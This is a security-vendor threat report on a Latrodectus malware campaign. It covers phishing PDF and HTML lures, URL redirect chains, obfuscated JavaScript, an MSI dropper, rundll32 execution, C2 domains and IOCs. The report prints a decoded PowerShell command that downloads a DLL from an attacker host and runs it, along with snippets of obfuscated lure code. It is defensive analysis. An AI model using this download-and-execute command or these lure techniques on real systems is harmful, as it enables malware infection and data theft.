Inside the Latrodectus Malware Campaign

This report offers an in-depth analysis of recent Latrodectus campaign activity uncovered by our X-Labs research team.  One of the principal dissemination techniques for Latrodectus involves phishing emails, leveraging infrastructure like that of IcedID. 

Latrodectus primarily targets financial, automotive and healthcare business sectors.  By compromising email accounts and distributing malicious attachments, it propagates across a broader network of potential targets. 

Currently, threat actors are increasingly adopting Latrodectus, utilizing prevalent attachment formats such as HTML and PDF. It is typically engineered for stealth and persistence, complicating detection and eradication efforts. This can lead to the exfiltration of personal data, financial losses due to fraud or extortion, and the compromise of sensitive information.

The Latrodectus campaign initiates with attacks originating from a compromised email that appears to contain critical DocuSign documents. Users are encouraged to access the document via the provided link. When the link is clicked, users are redirected to a malicious URL, resulting in the inadvertent download of the next-stage payload.

Fig. 1 - Attack chain

Fig. 2 - Initial access PDF

Fig. 3 - PDF suspicious embedded URL

PDF contains compromised domain with redirection:
“hxxps://delview[.]com/MobileDefault[.]aspx?reff=hxxps://cutt[.]ly/seU8MT6t#_fZ0NmW”

 It redirects to shortner URLs to another suspicious domain:

 “hxxps://digitalpinnaclepub[.]com/?3” and finally redirects to “storage.googleapis.com” project to download malicious obfuscated JavaScricpt “hxxps://storage[.]googleapis[.]com/braided-turbine-435813-n7[.]appspot[.]com/VA8PBxartt/Document-20-17-57.js”

Obfuscated JavaScript Analysis:

• JavaScript contains a lot of junk messages in “//” which increases obfuscation and file size. Actual malicious JavaScript code is commented in “////”

Fig. 4 - Obfuscated JavaScript payload

• After removing junk messages, it shows obfuscated JavaScript string manipulation replace and join functions. Replacing “////” with a space (“ “) shows actual malcode.

Fig. 5 - Deobfuscated Javascript string manipulation functions

• After deobfuscation, it creates ActiveXObject("WindowsInstaller.Installer") and downloads a .msi installer file. See Fig. 6 below:

 Fig. 6  - Deobfuscated Javascript code downloads MSI file

MSI Analysis:

• MSI file is executed via JavaScript and drops malicious 64-bit .dll file in %appdata%. It also executes .dll with rundll32.exe using export function parameters.

Fig. 7 - MSI file

• Dropped .dll contains export function “GetDeepDVCState” and MSIexecute this .dll with parameter “/DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\Admin\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState”

DLL Analysis:

• DLL is a Microsoft Visual C++ 64-bit binary with fake NVIDIA version information:

Fig. 8  - DLL vesion info

• Upon analysis, this DLL unpacks another stage DLL payload in memory:

 Fig. 9 - DLL verion info.

Unpacked 64-bit dll binary connects to malicious C2 server on unusual port 8041.

Greshunka[.]com:8041/bazar.php

Initial Access via HTML

Phishing HTML page which looks like a Word document pop-up to the user. Clicking on the button executes malicious JavaScript code embedded in HTML. See Fig. 10 below:

Fig. 10  - HTML attachment

It contains pop-up warning messages in reverse order:

“document.getElementById("prompt").innerHTML = ll('.nottub >b/<"noituloS">b< eht gnisu woleb snoitcurtsni eht wollof esaelP .tnemucod siht fo yalpsid enilffo tcerroc troppus ton seod resworb ruoY');”

Reversed message: 

Your browser does not support correct offline display of this document. Please follow the instructions below using the

It also uses different string encoding window.atob() and obfuscation functions s.split("").reverse().join(""); 

Fig. 11 - Suspicious code in HTML

Decoded base64 code

cmd /c start /min powershell $path='%appdata%\witwin_st_x64.dll';iwr hxxp://gertioma[.]top/o.jpg -outfile $path; start-process rundll32 $path,NxReleasePMap8==

It shows threat actors try to use HTML to launch PowerShell and directly downloads the DLL payload without MSI and executes it with rundll32.exe and connects to C2. We have observed few campaigns with an HTML attachment in compromised emails.

Conclusion:

Threat actors continue to use older emails to target users via suspicious PDF or HTML attachments. They use a redirection method with URL shorteners and host malicious payloads on well-known storage[.]googleapis[.]com hosting projects. Then downloads obfuscated JavaScript to download MSI and uses rundll32.exe to execute 64-bit DLL. 

This campaign mixes the old with the new. Latrodectus leverages older infrastructure, combined with a new, innovative malware payload distribution method to financial, automotive and business sectors.

Protection statement: 

Forcepoint customers are protected against this threat at the following stages of attack:

• Stage 2 (Lure) – Malicious PDF and HTML attachments associated with these attacks are identified and blocked.
• Stage 3 (Redirect) – Blocked redirectional shortened URLs and compromised domains
• Stage 5 (Dropper File) - The dropper files are added to Forcepoint malicious database and are blocked.
• Stage 6 (Call Home) - Blocked C2 credentials

IOCs

Initial Stage URLs: 

• hxxps://delview[.]com/MobileDefault[.]aspx?reff=hxxps://cutt[.]ly/seU8MT6t#_fZ0NmW
• hxxps://cutt[.]ly/seU8MT6t#_fZ0NmW
• hxxps://digitalpinnaclepub[.]com/?3
• hxxps://storage[.]googleapis[.]com/braided-turbine-435813-n7[.]appspot[.]com/VA8PBxartt/Document-20-17-57.js
• hxxp://194[.]54[.]156[.]91/dsa.msi
• hxxp://gertioma[.]top/o.jpg

C2s:

• tiguanin[.]com
• greshunka[.]com
• bazarunet[.]com
• mazinom[.]com
• leroboy[.]com
• krinzhodom[.]com
• klemanzino[.]net
• rilomenifis[.]com
• isomicrotich[.]com

Hashes:

• 35A990C3BE798108C9D12A47F4A028468EA6095B
• 9361621490915EBB919B79C6101874F03E4E51BC
• 71E99A21FFA29E1E391811F5A3D04DCBB9CF0949
• 570c4ab78cf4bb22b78aac215a4a79189d4fa9ed
• 62e23500cc5368e37be47371342784f72e481647
• 881993bcb37aa9504249271b7559addc0c633f09
• 7474873629399ee5fdd984c99b705e0490ab8707